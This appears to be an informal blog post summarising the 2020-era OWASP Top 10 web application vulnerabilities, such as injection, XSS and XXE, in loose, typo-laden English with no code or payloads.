What are the OWASP Top 10 vulnerabilities in 2020
The OWASP web testing guide basically contains almost everything that you would test a web application for The methodology is comprehensive and is designed by some of the best web application Security.
OSASP is focused on the top 10 Web Application vulnerabilities, 10 most critical 10 most seen application vulnerabilities in 2020
Injection happens when an attacker injects a bit of code to trick an application into performing unintended actions. The most common and well-known injection attack is SQL injection (SQLI), Vulnerabilities
2. Broken Authentication
insecure login form and save user password plain text Broken Auth logout management explain with an example I am login a website after completing our work I logout our ID and hacker press back button and my id is login this is broken Auth logout management
Broken Auth Password Attack ex: A hacker using burp suite and capture login request and send interpreter and send request intruder and brute force username password
3. Sensitive data exposure
Unintended data display is a serious problem for anyone operating a web application that contains user data. password/ card number/ username phone number health information and other sensitive information stored without encryption
4. XML external entities
XML processors are often configured to load the contents of external files specified in an XML document. A hacker upload a malicious XML code and steal user cookies session-id and use XML code to find server password and server directory
5. Broken access control
In website security, the access control means to put a limit on what sections or pages visitors can reach, depending on their needs.
Broken access control occurs when users can perform functions above their levels or gain access to other
6. Security misconfiguration
Hackers are always looking for ways to penetrate websites, and security misconfigurations can be an easy way in.
Developers and IT staff ensure functionality and not security. The configurations are done on the application server, DB server, proxy, applications, and other devices that need to be in line with the security requirements.
7. Cross-site scripting ( owasp top 10 2020 )
The data/scripts inserted by the attackers get executed in the browser can steal users’ data, deface websites, etc. types of XXS Reflected, Stored, DOM-based
8. Insecure deserialization
Insecure deserialization often leads to remote code execution.
Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.
9. Using components with known vulnerabilities
There is a wealth of reusable software components available to application developers. Many of these components are open source, developed with voluntary contributions, and available for free. Developers can quickly build feature-rich applications using these third-party components.
10. Insufficient logging and monitoring
Without proper validation, users may be redirected to prevent malicious websites check user failure put a firewall check all login attempt
Joomla setup apache server link